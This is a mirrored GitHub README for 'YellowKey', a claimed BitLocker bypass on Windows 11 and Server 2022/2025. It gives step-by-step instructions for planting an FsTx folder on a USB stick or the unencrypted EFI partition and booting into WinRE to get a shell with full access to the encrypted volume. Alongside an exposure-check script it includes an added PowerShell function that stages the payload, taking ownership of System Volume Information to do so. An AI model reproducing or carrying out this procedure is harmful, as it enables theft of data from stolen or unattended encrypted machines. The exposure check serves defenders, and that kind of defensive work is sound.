mirror of
https://github.com/Nightmare-Eclipse/YellowKey.git
synced 2026-05-16 10:40:10 +00:00
# YellowKey

### YellowKey BitLocker Bypass Vulnerability

It's been a while since I saw a BitLocker bypass around; my turn.

This is one of the most insane discoveries I have ever found; it almost feels like a **backdoor**, but what do you know, maybe I'm just insane.

---

# Affected Systems

- Windows 11
- Windows Server 2022
- Windows Server 2025

Windows 10 does **NOT** appear to be affected.

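The PowerShell below is an added example, not part of the YellowKey repository, for triaging a fleet against the list above: it reports which OS family a host belongs to, whether the system drive is BitLocker-protected (the precondition for the steps that follow) and whether WinRE is registered, since the bypass boots through it. Family detection trusts the `Win32_OperatingSystem` caption where it names the product; the build-number thresholds used as a fallback (22000 for Windows 11, 20348 for Server 2022, 26100 for Server 2025) are my own assumption, as the page itself lists only product families.

```powershell
# Added example, not from the YellowKey repository: classify a host against the
# affected-OS list on this page and report the BitLocker / WinRE preconditions.
# Run in an elevated PowerShell; Get-BitLockerVolume and reagentc need admin rights.

function Get-YellowKeyExposure {
    [CmdletBinding()]
    param()

    $os       = Get-CimInstance -ClassName Win32_OperatingSystem
    $build    = [int]$os.BuildNumber
    $isServer = $os.ProductType -ne 1      # 1 = workstation, 2 = domain controller, 3 = server

    # Family detection: the caption is authoritative where it names the product;
    # the build thresholds below are an assumption, used only as a fallback.
    $family = switch -Regex ($os.Caption) {
        'Windows Server 2025' { 'Server 2025'; break }
        'Windows Server 2022' { 'Server 2022'; break }
        'Windows 11'          { 'Windows 11';  break }
        'Windows 10'          { 'Windows 10';  break }
        default {
            if ($isServer) {
                if ($build -ge 26100) { 'Server 2025' }
                elseif ($build -ge 20348) { 'Server 2022' }
                else { 'Other server' }
            } else {
                if ($build -ge 22000) { 'Windows 11' } else { 'Windows 10' }
            }
        }
    }
    $affectedFamilies = @('Windows 11', 'Server 2022', 'Server 2025')

    # BitLocker state of the OS volume; fall back to manage-bde if the module is absent.
    $protection = 'Unknown'
    $protectors = @()
    try {
        $vol = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction Stop
        $protection = [string]$vol.ProtectionStatus          # On / Off
        $protectors = @($vol.KeyProtector | ForEach-Object { [string]$_.KeyProtectorType })
    } catch {
        $status = (& manage-bde.exe -status $env:SystemDrive 2>$null) -join "`n"
        if ($status -match 'Protection Status:\s+Protection (On|Off)') { $protection = $Matches[1] }
    }

    # WinRE: reagentc prints "Windows RE status: Enabled" when a recovery image is registered.
    $winre = 'Unknown'
    $re = (& reagentc.exe /info 2>$null) -join "`n"
    if ($re -match 'Windows RE status:\s+(\w+)') { $winre = $Matches[1] }

    $inList = $affectedFamilies -contains $family
    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        Caption            = $os.Caption
        Build              = $build
        Family             = $family
        AffectedFamily     = $inList
        BitLocker          = $protection
        KeyProtectors      = ($protectors -join ',')
        WinRE              = $winre
        # All three preconditions this page relies on: listed OS, BitLocker on, WinRE bootable.
        MeetsPreconditions = $inList -and ($protection -eq 'On') -and ($winre -eq 'Enabled')
    }
}

Get-YellowKeyExposure | Format-List
```

`KeyProtectors` is included because it tells you at a glance whether the host is TPM-only or has a PIN or startup key; the page does not say whether that changes the outcome, so the field is reported, not used in the verdict.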
---

# How To Reproduce

## 1. Copy FsTx

Copy the `FsTx` folder to:

```text
YourUSBStick:\System Volume Information\FsTx
```

Use a Windows-compatible filesystem:

- NTFS (recommended)
- FAT32
- exFAT

Conveniently, you don't even need an external storage device. You can literally:

- Pull the disk out
- Copy the files into the EFI partition
- Put the disk back

…and it will still work, because the EFI system partition is a plain FAT volume that BitLocker never encrypts, so any other OS can write to it once the disk is out.

That's how bad it is.

---

## 2. Plug The USB Device

Insert the USB stick into the target Windows machine with BitLocker enabled.

---

## 3. Reboot Into WinRE

Hold `SHIFT` and click the Restart entry in the power menu (Start menu or sign-in screen) using your mouse.

This boots the system into the Windows Recovery Environment (WinRE).

---

## 4. Trigger The Vulnerability

Once you have clicked Restart:

- Release `SHIFT`
- Hold `CTRL`
- DO NOT release it

---

## 5. Enjoy The Shell

If everything was done correctly, a shell spawns with unrestricted access to the BitLocker-protected volume.

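Step 1 is the only part of the procedure above that is scripted rather than typed at the keyboard. The PowerShell below is an added example, not part of the YellowKey repository, that stages the repository's `FsTx` folder onto a removable drive at the path step 1 gives; `$FsTxSource` and `$UsbDrive` are assumed parameters. The practical wrinkle is `System Volume Information`: on NTFS, Windows pre-creates it as a hidden directory whose ACL grants only `SYSTEM`, so even an elevated administrator gets Access Denied until ownership is taken, while on FAT32 and exFAT it is just a hidden folder that may not exist yet.

```powershell
# Added example, not from the YellowKey repository: stage FsTx onto a USB stick
# at <drive>:\System Volume Information\FsTx (the path from step 1 above).
# Run elevated. $FsTxSource and $UsbDrive are assumed inputs, not names from the repo.

function Copy-FsTxToDrive {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$FsTxSource,   # e.g. C:\YellowKey\FsTx (assumed location)
        [Parameter(Mandatory)][string]$UsbDrive      # e.g. 'E:'
    )

    $letter = $UsbDrive.TrimEnd(':', '\')
    $vol = Get-Volume -DriveLetter $letter -ErrorAction Stop

    # The page lists NTFS, FAT32 and exFAT; refuse anything else (ReFS, UDF, ...).
    if ($vol.FileSystem -notin @('NTFS', 'FAT32', 'exFAT')) {
        throw "Drive $letter is $($vol.FileSystem); reformat it as NTFS, FAT32 or exFAT first."
    }
    if (-not (Test-Path -LiteralPath $FsTxSource -PathType Container)) {
        throw "FsTx source folder not found: $FsTxSource"
    }

    $svi  = Join-Path "${letter}:\" 'System Volume Information'
    $dest = Join-Path $svi 'FsTx'

    # On NTFS the SVI folder already exists with a SYSTEM-only ACL, so take ownership
    # for Administrators and grant them full control before touching it. FAT/exFAT
    # have no ACLs; there the folder is simply created if missing.
    if ($vol.FileSystem -eq 'NTFS' -and (Test-Path -LiteralPath $svi)) {
        & takeown.exe /F $svi /A /R /D Y | Out-Null
        & icacls.exe $svi /grant 'BUILTIN\Administrators:(OI)(CI)F' /T | Out-Null
    }
    New-Item -ItemType Directory -Path $svi -Force | Out-Null

    # Remove a previous staging first: Copy-Item would otherwise nest FsTx\FsTx.
    if (Test-Path -LiteralPath $dest) {
        Remove-Item -LiteralPath $dest -Recurse -Force
    }
    Copy-Item -LiteralPath $FsTxSource -Destination $dest -Recurse -Force

    # Keep SVI hidden+system like Windows does, so casual browsing does not show it.
    (Get-Item -LiteralPath $svi -Force).Attributes = 'Hidden, System, Directory'

    # Return what was staged so the caller can check it before rebooting.
    Get-ChildItem -LiteralPath $dest -Recurse -Force | Select-Object FullName, Length
}

# Usage (assumed paths):
# Copy-FsTxToDrive -FsTxSource 'C:\YellowKey\FsTx' -UsbDrive 'E:'
```

The same function works for a plain FAT volume mounted from a pulled disk, which is the "no USB stick" variant described under step 1, since the only filesystem-specific branch is the NTFS ACL repair.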
---

# Demonstration

<img width="1370" height="777" alt="shell" src="https://github.com/user-attachments/assets/eda6c823-4a6b-4aec-bad2-b9afad640dd6" />

---

# Why Does This Feel Like A Backdoor?

The component responsible for this bug:

- Is not present anywhere publicly
- Does not appear on the internet
- Exists only inside the WinRE image

What makes this even more suspicious is that the exact same component also exists in normal Windows installations, under the exact same name, except without the functionality that triggers the BitLocker bypass.

Why?

I genuinely can't come up with an explanation besides the possibility that this behavior was intentional.

Even stranger:

- Among client versions, only Windows 11 is affected
- Server 2022/2025 are affected
- Windows 10 is completely unaffected

---

# Special Thanks

Huge thanks to:

- MORSE
- MSTIC
- Microsoft GHOST

For making this public disclosure possible ;)